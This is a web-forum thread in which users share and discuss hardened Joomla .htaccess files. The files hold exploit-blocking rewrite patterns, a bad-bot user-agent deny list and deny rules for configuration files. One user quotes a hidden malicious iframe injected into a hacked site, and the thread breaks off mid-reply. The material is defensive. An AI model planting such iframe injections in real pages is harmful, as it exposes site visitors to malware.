Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.6

[Guest]

Username:
Password:
1 Hour 1 Day 1 Week 1 Month Forever

Welcome, Guest. Please login or register.
Did you miss your activation email?

There aren't any users online.

• Joomla 1.6 Beta 9 Now Available
• The Joomla Project is proud to announce the immedi...
• Joomla 1.6 Beta 8 Now Available
• The Joomla Project is proud to announce the immedi...
• Joomla 1.6 Beta 7 Now Available
• The Joomla Project is proud to announce the immedi...

Welcome to Locutus web services forum!

[locutus]

I added some extra security stuff to my .htaccess to harden my Joomla install. Blocked some common bad bots, made some files invisible and some rules used by exploits. The list is quite long and could slow down your site, but I have never seen that. Please note, this is not a substitute for not upgrading core or 3rd party extensions.

Added in version 2.0 (august 2008)

• Extended list of bad bots
• Compressed the same list
• Block out rules for proxy servers
• Create a 403 document on the fly

Added in version 2.1 (september 2008)

• Rules for masked URLs like http%3A
• Special versions for Joomla 1.0.x and 1.5.x

Added in version 2.2 (April 2009)

• Deny access to vital configuration files
• Add www before the URL for Google page rank

Added in version 2.3 (september 2009)

• Block cross site scripting
• Added some bad bots
• Miscellaneous tweaks

Added in version 2.4 (October 2009)

• Compressed some code
• Added some extra rules
• Miscellaneous tweaks

Added in version 2.5 (November 2009)

• Fixed major bug in the Joomla 1.5.x version. All users are urged to upgrade.
• Enabled proxie acces in the Joomla 1.5.x version by default, J! 1.5.x should be stable enough by now. Paranoid mode is still possible.

Added in version 2.6 (November 2009)

• Fixed small bug in the Joomla 1.5.x version.

.htaccess for Joomla 1.0.x

Code:

##
# This is a heavily modified .htaccess file based on the standard Joomla htaccess.txt
# For updates please visit http://locutusweb.asw15.org
# VERSION 2.4 FOR JOOMLA 1.0.X
#
# DISCLAIMER: We are not responsible for data loss and/or damage to your website what so ever
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################

########## Begin - Disable the server signature
#
ServerSignature Off
#
########## End - Disable the server signature

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section
## Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section

########## Begin - Limit server request methods to GET and PUT
#
Options -ExecCGI -Indexes -All
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|DELETE)
RewriteRule .* - [F]
#
########## End - Limit server request methods to GET and PUT

########## Begin - Rewrite rules to block out referrers to external scripts
#
#IF the URI refers to a external script with a "http:" or "ftp:" or "https" (often ":" is masked with "%3A")
RewriteCond %{QUERY_STRING} (https?|ftp)(\:|\%3A) [NC]
##The next line is needed for Joomla 1.0.x please replace example.com with your own domain. Remove the # sign after customizing
#RewriteCond %{QUERY_STRING} !return=http\%3A\%2F\%2Fwww\.example\.com(\%2F)?&? [NC]
RewriteRule \.php[45]?$ - [F]
#
########## End - Rewrite rules to block out referrers to external scripts

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]
## OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]
## Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
## Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
## Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
## Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
## Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
## Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

########## Begin - Rewrite rules to block out some bad bots
#
RewriteCond %{HTTP_USER_AGENT} ADSARobot|ah-ha|almaden|aktuelles|Anarchie|amzn_assoc|ASPSeek|ASSORT|ATHENS|Atomz|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|Boston\ Project|BravoBrian\ SpiderEngine\ MarcoPolo|Bot\ mailto:craftbot@yahoo.com|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Collector|Copier|Crescent|Crescent\ Internet\ ToolPak|Custo|cyberalert|DA$|Deweb|diagem|Digger|Digimarc|DIIbot|DISCo|DISCo\ Pump|DISCoFinder|Download\ Demon|Download\ Wonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|ecollector|efp@gmx\.net|Email\ Extractor|EirGrabber|email|EmailCollector|EmailSiphon|EmailWolf|Express\ WebPictures|ExtractorPro|EyeNetIE|FavOrg|fastlwspider|Favorites\ Sweeper|Fetch|FEZhead|FileHound|FlashGet\ WebWasher|FlickBot|fluffy|FrontPage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go\!Zilla|Go!Zilla|Go-Ahead-Got-It|GornKer|gotit|Grabber|GrabNet|Grafula|Green\ Research|grub-client|Harvest|hgrepurl|hhjhj@yahoo|hloader|HMView|HomePageSearch|http\ generic|HTTrack|httpdown|httrack|ia_archiver|IBM_Planetwide|Image\ Stripper|Image\ Sucker|imagefetch|IncyWincy|Indy*Library|Indy\ Library|informant|Ingelin|InterGET|Internet\ Ninja|InternetLinkagent|Internet\ Ninja|InternetSeer\.com|Iria|Irvine|JBH*agent|JetCar|JOC|JOC\ Web\ Spider|JustView|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|lwp-trivial|Mag-Net|Magnet|Mac\ Finder|Mag-Net|Mass\ Downloader|MCspider|Memo|Microsoft.URL|MIDown\ tool|Mirror|Missigua\ Locator|Mister\ PiX|MMMtoCrawl\/UrlDispatcherLLL|^Mozilla$|Mozilla.*Indy|Mozilla.*NEWT|Mozilla*MSIECrawler|MS\ FrontPage*|MSFrontPage|MSIECrawler|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|NetMechanic|netprospector|NetResearchServer|NetSpider|Net\ Vampire|NetZIP|NetZip\ Downloader|NetZippy|NEWT|NICErsPRO|Ninja|NPBot|Octopus|Offline\ Explorer|Offline\ Navigator|OpaL|Openfind|OpenTextSiteCrawler|OrangeBot|OrangeSpider|PageGrabber|Papa\ Foto|PackRat|pavuk|pcBrowser|PersonaPilot|Ping|PingALink|Pockey|Proxy|psbot|.*psycheclone|PSurf|puf|Pump|PushSite|QRVA|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|Scooter|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Seeker|Shai|Siphon|sitecheck|sitecheck.internetseer.com|SiteSnagger|SlySearch|SmartDownload|snagger|Snake|SpaceBison|Spegla|SpiderBot|sproose|SqWorm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Templeton|TrueRobot|TV33_Mercator|UIowaCrawler|UtilMind|URLSpiderPro|URL_Spider_Pro|Vacuum|vagabondo|vayala|visibilitygap|VoidEYE|vspider|Web\ Downloader|w3mir|Web\ Data\ Extractor|Web\ Image\ Collector|Web\ Sucker|Wweb|WebAuto|WebBandit|web\.by\.mail|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|webdevil|webdownloader|Webdup|WebEMailExtrac|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WEBMASTERS|WebMiner|WebMirror|webmole|WebReaper|WebSauger|Website|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|wbdbot|Wget|Whacker|whizbang|WhosTalking|Widow|WISEbot|WWWOFFLE|x-Tractor|^Xaldon\ WebSpider|WUMPUS|Xenu|XGET|Zeus.*Webster|Zeus [NC]
RewriteRule ^.* - [F,L]
#
########## End - Rewrite rules to block out some bad bots

########## Begin - Rewrite rules to block proxy servers from site access
#
RewriteCond %{HTTP:VIA}                 !^$ [OR]
RewriteCond %{HTTP:FORWARDED}           !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR}     !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION}    !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP}      !^$
RewriteRule ^(.*)$ - [F]
#
########## End - Rewrite rules to block proxy servers from site access

########## Begin - Deny direct access to htaccess-, configuration and settings files
#
<FilesMatch ".htaccess|configuration.php|config.php|Settings.php|Settings_bak.php">
order allow,deny
deny from all
</FilesMatch>
#
########## End -  Deny direct access to htaccess-, configuration and settings files

########## Begin - Deny access to all CGI, Perl, Python, xml, text and php~ files
#
<FilesMatch "\.(cgi|pl|py|xml|php~|txt)">
Deny from all
</FilesMatch>
##Allow only robots.txt file, if not allowed add sign # at the start of following 3 lines
<FilesMatch robots.txt>
Allow from all
</FilesMatch>
#
########## End - Deny access to all CGI, Perl, Python, xml, text and php~ files

########## Begin - Do not index certain files
#
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
#
########## End - Do not index certain files

########## Begin - On the fly custom forbidden page
#
ErrorDocument 403 "<html><head><title>Access forbidden</title></head><body><h2><tt>Sorry, It's forbidden to access the page you requested!</tt></h2></body></html>
#
########## End - On the fly custom forbidden page

########## Begin - Redirect non-www URLs to www to improve Google Page Rank
#
## In the next lines please replace example.com with your own domain. Remove the # sign after customizing
#rewritecond %{http_host} ^example.com
#rewriteRule ^(.*) http://www.example.com/$1 [R=301,L]
#
########## End - Redirect non-www URLs to www to improve Google Page Rank

########## Begin - Personal server settings
#
php_flag magic_quotes_gpc On

.htaccess for Joomla 1.5.x

Code:

##
# This is a heavily modified .htaccess file based on the standard Joomla htaccess.txt
# For updates please visit http://locutusweb.asw15.org
# VERSION 2.6 FOR JOOMLA 1.5.X
#
# DISCLAIMER: We are not responsible for data loss and/or damage to your website what so ever
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# To force www. before your domain tld, please adapt the lines 74 and 75 to your needs.
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################

########## Begin - Disable the server signature
#
ServerSignature Off
#
########## End - Disable the server signature

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

# RewriteBase /

########## Begin - Redirect non-www URLs to www to improve Google Page Rank
#
## In the next lines please replace example.com with your own domain. Remove the # sign after customizing
#rewritecond %{http_host} ^example.com
#rewriteRule ^(.*) http://www.example.com/$1 [R=301,L]
#
########## End - Redirect non-www URLs to www to improve Google Page Rank

########## Begin - Rewrite rules to block out referrers to external scripts
#
## If the URI refers to a external script with a "http:" or "ftp:" or "https" (often ":" is masked with "%3A")
RewriteCond %{QUERY_STRING} (https?|ftp)(\:|\%3A) [NC]
RewriteRule \.php[45]?$ - [F]
#
########## End - Rewrite rules to block out referrers to external scripts

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## if the URI contains a "["
#RewriteCond %{QUERY_STRING} \[ [OR]
## OR if the URI contains a "]"
#RewriteCond %{QUERY_STRING} \] [OR]
## Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
## Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
## Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
## Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
## Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
## Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

########## Begin - Rewrite rules to block out some bad bots
#
RewriteCond %{HTTP_USER_AGENT} ADSARobot|ah-ha|almaden|aktuelles|Anarchie|amzn_assoc|ASPSeek|ASSORT|ATHENS|Atomz|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|Boston\ Project|BravoBrian\ SpiderEngine\ MarcoPolo|Bot\ mailto:craftbot@yahoo.com|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Collector|Copier|Crescent|Crescent\ Internet\ ToolPak|Custo|cyberalert|DA$|Deweb|diagem|Digger|Digimarc|DIIbot|DISCo|DISCo\ Pump|DISCoFinder|Download\ Demon|Download\ Wonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|ecollector|efp@gmx\.net|Email\ Extractor|EirGrabber|email|EmailCollector|EmailSiphon|EmailWolf|Express\ WebPictures|ExtractorPro|EyeNetIE|FavOrg|fastlwspider|Favorites\ Sweeper|Fetch|FEZhead|FileHound|FlashGet\ WebWasher|FlickBot|fluffy|FrontPage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go\!Zilla|Go!Zilla|Go-Ahead-Got-It|GornKer|gotit|Grabber|GrabNet|Grafula|Green\ Research|grub-client|Harvest|hgrepurl|hhjhj@yahoo|hloader|HMView|HomePageSearch|http\ generic|HTTrack|httpdown|httrack|ia_archiver|IBM_Planetwide|Image\ Stripper|Image\ Sucker|imagefetch|IncyWincy|Indy*Library|Indy\ Library|informant|Ingelin|InterGET|Internet\ Ninja|InternetLinkagent|Internet\ Ninja|InternetSeer\.com|Iria|Irvine|JBH*agent|JetCar|JOC|JOC\ Web\ Spider|JustView|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|lwp-trivial|Mag-Net|Magnet|Mac\ Finder|Mag-Net|Mass\ Downloader|MCspider|Memo|Microsoft.URL|MIDown\ tool|Mirror|Missigua\ Locator|Mister\ PiX|MMMtoCrawl\/UrlDispatcherLLL|^Mozilla$|Mozilla.*Indy|Mozilla.*NEWT|Mozilla*MSIECrawler|MS\ FrontPage*|MSFrontPage|MSIECrawler|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|NetMechanic|netprospector|NetResearchServer|NetSpider|Net\ Vampire|NetZIP|NetZip\ Downloader|NetZippy|NEWT|NICErsPRO|Ninja|NPBot|Octopus|Offline\ Explorer|Offline\ Navigator|OpaL|Openfind|OpenTextSiteCrawler|OrangeBot|OrangeSpider|PageGrabber|Papa\ Foto|PackRat|pavuk|pcBrowser|PersonaPilot|Ping|PingALink|Pockey|Proxy|psbot|.*psycheclone|PSurf|puf|Pump|PushSite|QRVA|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|Scooter|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Seeker|Shai|Siphon|sitecheck|sitecheck.internetseer.com|SiteSnagger|SlySearch|SmartDownload|snagger|Snake|SpaceBison|Spegla|SpiderBot|sproose|SqWorm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Templeton|TrueRobot|TV33_Mercator|UIowaCrawler|UtilMind|URLSpiderPro|URL_Spider_Pro|Vacuum|vagabondo|vayala|visibilitygap|VoidEYE|vspider|Web\ Downloader|w3mir|Web\ Data\ Extractor|Web\ Image\ Collector|Web\ Sucker|Wweb|WebAuto|WebBandit|web\.by\.mail|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|webdevil|webdownloader|Webdup|WebEMailExtrac|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WEBMASTERS|WebMiner|WebMirror|webmole|WebReaper|WebSauger|Website|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|wbdbot|Wget|Whacker|whizbang|WhosTalking|Widow|WISEbot|WWWOFFLE|x-Tractor|^Xaldon\ WebSpider|WUMPUS|Xenu|XGET|Zeus.*Webster|Zeus [NC]
RewriteRule ^.* - [F,L]
#
########## End - Rewrite rules to block out some bad bots

########## Begin - Rewrite rules to block proxy servers from site access
#
## Lots of script kiddies attack via proxies; enable next lines for paranoid mode
#RewriteCond %{HTTP:VIA}                 !^$ [OR]
#RewriteCond %{HTTP:FORWARDED}           !^$ [OR]
#RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
#RewriteCond %{HTTP:X_FORWARDED_FOR}     !^$ [OR]
#RewriteCond %{HTTP:PROXY_CONNECTION}    !^$ [OR]
#RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
#RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
#RewriteCond %{HTTP:HTTP_CLIENT_IP}      !^$
#RewriteRule ^(.*)$ - [F]
#
########## End - Rewrite rules to block proxy servers from site access

########## Begin - Deny direct access to htaccess-, configuration and settings files
#
<FilesMatch ".htaccess|configuration.php|config.php|Settings.php|Settings_bak.php">
order allow,deny
deny from all
</FilesMatch>
#
########## End -  Deny direct access to htaccess-, configuration and settings files

########## Begin - Deny access to all CGI, Perl, Python, xml, text and php~ files
#
<FilesMatch "\.(cgi|pl|py|xml|php~|txt)">
Deny from all
</FilesMatch>
##Allow only robots.txt file, if not allowed add sign # at the start of following 3 lines
<FilesMatch robots.txt>
Allow from all
</FilesMatch>
#
########## End - Deny access to all CGI, Perl, Python, xml, text and php~ files

########## Begin - Do not index certain files
#
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
#
########## End - Do not index certain files

########## Begin - Limit server request methods to GET and PUT
#
Options -ExecCGI -Indexes -All
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|DELETE)
RewriteRule .* - [F]
#
########## End - Limit server request methods to GET and PUT

########## Begin - On the fly custom forbidden page
#
ErrorDocument 403 "<html><head><title>Access forbidden</title></head><body><h2><tt>Sorry, It's forbidden to access the page you requested!</tt></h2></body></html>
#
########## End - On the fly custom forbidden page

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

########## Begin - Personal server settings
php_flag magic_quotes_gpc On

[cantthinkofanickname]

I don't begin to understand the .htaccess. (1.0.15) my existing one is below and I am thinking of adding some of those in the post above.

1. Does it matter which order these rules appear?
2. Does my existing one do the job or should I copy in those which are missing?
3. How does one test such a file to know it works or is it just blind faith?
Thanks.
##
# @version $Id: htaccess.txt 5973 2006-12-11 01:26:33Z robs $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
#######################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################
##following added 06/04/08 by RM
<Files .htaccess>
order allow,deny
deny from all
</Files>
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
##following added 06/04/08 by RM
RewriteCond %{REQUEST_METHOD} ^{TRACE|TRACK}
RewriteRule .*-F

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

RewriteBase /


########## Begin - Joomla! core SEF Section
############# Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section



########## Begin - 3rd Party SEF Section
############# Use this section if you are using a 3rd party (Non Joomla! core) SEF extension - e.g. OpenSEF, 404_SEF, 404SEFx, SEF Advance, etc
#
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
#RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
#RewriteCond %{REQUEST_FILENAME} !-f
#RewriteCond %{REQUEST_FILENAME} !-d
#RewriteRule (.*) index.php
#
########## End - 3rd Party SEF Section



########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
#PUT following in to try from joomla post RM260308
#Block for libwww perl preventing amateur hackers
#
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ - [F]
#
########## End - Rewrite rules to block out some common exploits
php_value upload_max_filesize 4M
php_flag magic_quotes_gpc on
php_flag html_errors "0"

[locutus]

I don't begin to understand the .htaccess. (1.0.15) my existing one is below and I am thinking of adding some of those in the post above.

1. Does it matter which order these rules appear?

No, as long as this is above all:

Code:

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
##following added 06/04/08 by RM
RewriteCond %{REQUEST_METHOD} ^{TRACE|TRACK}
RewriteRule .*-F

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

RewriteBase /

2. Does my existing one do the job or should I copy in those which are missing?

As you see mine is more extensive. I should go for your last option. The only big difference I see is this rule:

Code:

RewriteCond %{REQUEST_METHOD} ^{TRACE|TRACK}
RewriteRule .*-F

Quite interesting, where did you found this one?

3. How does one test such a file to know it works or is it just blind faith?

It should work out of the box. If you get errors, just comment the new stuff and test it by uncommenting rule by rule.

Please let me know if something goes wrong, I am glad to help you out.

[exlemor]

Hi there,

Thank you so much for this updated .htaccess file.

I'm no expert at all with RegEx expression and I was wondering if you could clue me on how to add this site to the list of bad sites/bots:

[one of my customers' sites was hacked and they added <iframe statements in some of the following files: index.html, index.php and default.php with this in them:

Code:

<iframe src="http://bigtopmanagement.cn:8080/ts/in.cgi?pepsi12" width=2 height=4 style="visibility: hidden"></iframe>

I should add that this is for a Joomla v1.5.10 site.

Thanks in advance for the help.
Sincerely,

Emmanuel.

P.S.:  Is it possible to have some sort of .htaccess file which pulls from a trusted source on the internet [such as your site] another file with an updated list of these nasty sites so that we get a every growing list of sites to avoid? if that is possible, if the file in question got large-ish would that affect performance of the site enough to be noticeable?

[locutus]

Hi,

